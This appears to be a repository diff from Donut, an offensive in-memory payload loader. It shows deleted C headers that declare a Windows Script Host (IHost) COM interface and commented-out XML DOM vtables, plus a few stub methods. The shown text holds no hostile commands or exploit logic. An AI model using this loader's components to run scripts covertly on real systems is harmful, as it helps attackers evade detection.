328 IHost *iface, void **ppts) { // ppts is ITextStream
329 DPRINT("WScript::StdOut");
330
331 return E_NOTIMPL;
332 }
333
334 // Exposes the write-only error output stream for the current script.
335 static HRESULT WINAPI Host_get_StdErr(
336 IHost *iface, void **ppts) { // ppts is ITextStream
337 DPRINT("WScript::StdErr");
338
339 return E_NOTIMPL;
340 }
+0
-284
payload/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+0
-588
payload/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+0
